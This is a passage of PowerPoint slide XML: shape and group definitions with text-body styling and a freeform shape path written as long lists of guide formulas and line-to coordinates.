            <a:off x="5694362" y="2870200"/>
            <a:ext cx="263525" cy="777875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10246" name="Group 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1243012" y="1846263"/>
            <a:ext cx="8342313" cy="2620962"/>
            <a:chOff x="857" y="923"/>
            <a:chExt cx="3695" cy="1161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10599" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1847" y="923"/>
              <a:ext cx="3" cy="118"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10600" name="Group 7"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="857" y="955"/>
              <a:ext cx="3695" cy="1129"/>
              <a:chOff x="1114" y="2056"/>
              <a:chExt cx="3695" cy="1129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10601" name="Freeform 8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1114" y="2056"/>
                <a:ext cx="2312" cy="1129"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 69549 w 1672"/>
                  <a:gd name="T1" fmla="*/ 3 h 977"/>
                  <a:gd name="T2" fmla="*/ 114780 w 1672"/>
                  <a:gd name="T3" fmla="*/ 1 h 977"/>
                  <a:gd name="T4" fmla="*/ 168989 w 1672"/>
                  <a:gd name="T5" fmla="*/ 374 h 977"/>
                  <a:gd name="T6" fmla="*/ 254273 w 1672"/>
                  <a:gd name="T7" fmla="*/ 1127 h 977"/>
                  <a:gd name="T8" fmla="*/ 342920 w 1672"/>
                  <a:gd name="T9" fmla="*/ 1885 h 977"/>
                  <a:gd name="T10" fmla="*/ 407630 w 1672"/>
                  <a:gd name="T11" fmla="*/ 2178 h 977"/>
                  <a:gd name="T12" fmla="*/ 467749 w 1672"/>
                  <a:gd name="T13" fmla="*/ 2178 h 977"/>
                  <a:gd name="T14" fmla="*/ 578477 w 1672"/>
                  <a:gd name="T15" fmla="*/ 1885 h 977"/>
                  <a:gd name="T16" fmla="*/ 699463 w 1672"/>
                  <a:gd name="T17" fmla="*/ 1589 h 977"/>
                  <a:gd name="T18" fmla="*/ 771089 w 1672"/>
                  <a:gd name="T19" fmla="*/ 1589 h 977"/>
                  <a:gd name="T20" fmla="*/ 851241 w 1672"/>
                  <a:gd name="T21" fmla="*/ 1836 h 977"/>
                  <a:gd name="T22" fmla="*/ 944221 w 1672"/>
                  <a:gd name="T23" fmla="*/ 2192 h 977"/>
                  <a:gd name="T24" fmla="*/ 1075233 w 1672"/>
                  <a:gd name="T25" fmla="*/ 2793 h 977"/>
                  <a:gd name="T26" fmla="*/ 1229023 w 1672"/>
                  <a:gd name="T27" fmla="*/ 3749 h 977"/>
                  <a:gd name="T28" fmla="*/ 1328883 w 1672"/>
                  <a:gd name="T29" fmla="*/ 4593 h 977"/>
                  <a:gd name="T30" fmla="*/ 1394107 w 1672"/>
                  <a:gd name="T31" fmla="*/ 5388 h 977"/>
                  <a:gd name="T32" fmla="*/ 1426255 w 1672"/>
                  <a:gd name="T33" fmla="*/ 5911 h 977"/>
                  <a:gd name="T34" fmla="*/ 1459963 w 1672"/>
                  <a:gd name="T35" fmla="*/ 6810 h 977"/>
                  <a:gd name="T36" fmla="*/ 1491161 w 1672"/>
                  <a:gd name="T37" fmla="*/ 8398 h 977"/>
                  <a:gd name="T38" fmla="*/ 1507109 w 1672"/>
                  <a:gd name="T39" fmla="*/ 10282 h 977"/>
                  <a:gd name="T40" fmla="*/ 1509511 w 1672"/>
                  <a:gd name="T41" fmla="*/ 12248 h 977"/>
                  <a:gd name="T42" fmla="*/ 1499093 w 1672"/>
                  <a:gd name="T43" fmla="*/ 14167 h 977"/>
                  <a:gd name="T44" fmla="*/ 1478772 w 1672"/>
                  <a:gd name="T45" fmla="*/ 15867 h 977"/>
                  <a:gd name="T46" fmla="*/ 1451466 w 1672"/>
                  <a:gd name="T47" fmla="*/ 17173 h 977"/>
                  <a:gd name="T48" fmla="*/ 1412860 w 1672"/>
                  <a:gd name="T49" fmla="*/ 18069 h 977"/>
                  <a:gd name="T50" fmla="*/ 1359984 w 1672"/>
                  <a:gd name="T51" fmla="*/ 18646 h 977"/>
                  <a:gd name="T52" fmla="*/ 1297114 w 1672"/>
                  <a:gd name="T53" fmla="*/ 18993 h 977"/>
                  <a:gd name="T54" fmla="*/ 1167535 w 1672"/>
                  <a:gd name="T55" fmla="*/ 19369 h 977"/>
                  <a:gd name="T56" fmla="*/ 1035256 w 1672"/>
                  <a:gd name="T57" fmla="*/ 19698 h 977"/>
                  <a:gd name="T58" fmla="*/ 955950 w 1672"/>
                  <a:gd name="T59" fmla="*/ 19929 h 977"/>
                  <a:gd name="T60" fmla="*/ 819135 w 1672"/>
                  <a:gd name="T61" fmla="*/ 20194 h 977"/>
                  <a:gd name="T62" fmla="*/ 681076 w 1672"/>
                  <a:gd name="T63" fmla="*/ 20292 h 977"/>
                  <a:gd name="T64" fmla="*/ 603520 w 1672"/>
                  <a:gd name="T65" fmla="*/ 20357 h 977"/>
                  <a:gd name="T66" fmla="*/ 535665 w 1672"/>
                  <a:gd name="T67" fmla="*/ 20357 h 977"/>
                  <a:gd name="T68" fmla="*/ 480917 w 1672"/>
                  <a:gd name="T69" fmla="*/ 20292 h 977"/>
                  <a:gd name="T70" fmla="*/ 436456 w 1672"/>
                  <a:gd name="T71" fmla="*/ 20228 h 977"/>
                  <a:gd name="T72" fmla="*/ 376722 w 1672"/>
                  <a:gd name="T73" fmla="*/ 19998 h 977"/>
                  <a:gd name="T74" fmla="*/ 294791 w 1672"/>
                  <a:gd name="T75" fmla="*/ 19519 h 977"/>
                  <a:gd name="T76" fmla="*/ 213188 w 1672"/>
                  <a:gd name="T77" fmla="*/ 19028 h 977"/>
                  <a:gd name="T78" fmla="*/ 128333 w 1672"/>
                  <a:gd name="T79" fmla="*/ 18452 h 977"/>
                  <a:gd name="T80" fmla="*/ 70459 w 1672"/>
                  <a:gd name="T81" fmla="*/ 17758 h 977"/>
                  <a:gd name="T82" fmla="*/ 42170 w 1672"/>
                  <a:gd name="T83" fmla="*/ 17131 h 977"/>
                  <a:gd name="T84" fmla="*/ 23362 w 1672"/>
                  <a:gd name="T85" fmla="*/ 16371 h 977"/>
                  <a:gd name="T86" fmla="*/ 6390 w 1672"/>
                  <a:gd name="T87" fmla="*/ 14924 h 977"/>
                  <a:gd name="T88" fmla="*/ 0 w 1672"/>
                  <a:gd name="T89" fmla="*/ 12748 h 977"/>
                  <a:gd name="T90" fmla="*/ 1941 w 1672"/>
                  <a:gd name="T91" fmla="*/ 10225 h 977"/>
                  <a:gd name="T92" fmla="*/ 1 w 1672"/>
                  <a:gd name="T93" fmla="*/ 8708 h 977"/>
                  <a:gd name="T94" fmla="*/ 0 w 1672"/>
                  <a:gd name="T95" fmla="*/ 6936 h 977"/>
                  <a:gd name="T96" fmla="*/ 1941 w 1672"/>
                  <a:gd name="T97" fmla="*/ 3922 h 977"/>
                  <a:gd name="T98" fmla="*/ 11445 w 1672"/>
                  <a:gd name="T99" fmla="*/ 2285 h 977"/>
                  <a:gd name="T100" fmla="*/ 25939 w 1672"/>
                  <a:gd name="T101" fmla="*/ 1008 h 977"/>
                  <a:gd name="T102" fmla="*/ 42170 w 1672"/>
                  <a:gd name="T103" fmla="*/ 447 h 9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72"/>
                  <a:gd name="T157" fmla="*/ 0 h 977"/>
                  <a:gd name="T158" fmla="*/ 1672 w 1672"/>
                  <a:gd name="T159" fmla="*/ 977 h 9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72" h="977">
                    <a:moveTo>
                      <a:pt x="54" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="559" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="804" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="871" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="906" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="923" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="961" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="980" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1003" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1024" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1046" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1092" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1239" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1288" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1313" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1337" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1361" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1384" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1406" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1429" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1450" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1490" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1509" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1527" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1535" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1543" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1551" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1558" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1565" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1572" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1579" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1585" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1591" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1597" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1607" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1616" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1625" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1633" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1640" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1647" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1651" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1656" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1661" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1664" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1667" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1669" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1671" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1671" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1672" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1671" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1671" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1670" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1668" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1665" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1663" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1660" y="680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1656" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1651" y="715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1648" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1643" y="747"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1637" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1632" y="776"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1626" y="790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1620" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1614" y="814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1607" y="825"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1600" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1592" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1584" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1574" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1564" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1553" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1543" y="879"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1531" y="884"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1518" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="895"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1493" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="902"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="915"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1390" y="919"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1293" y="930"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1259" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1227" y="936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1162" y="944"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1146" y="946"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1130" y="949"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1112" y="950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1095" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1077" y="954"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1059" y="956"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1022" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="945" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="970"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="791" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="718" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="607" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="972"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="970"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="417" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="946"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="942"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="937"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="928"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="914"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="908"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="903"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="891"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="877"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="815"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="801"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="786"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="778"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="110"/>
                    </a:lnTo>
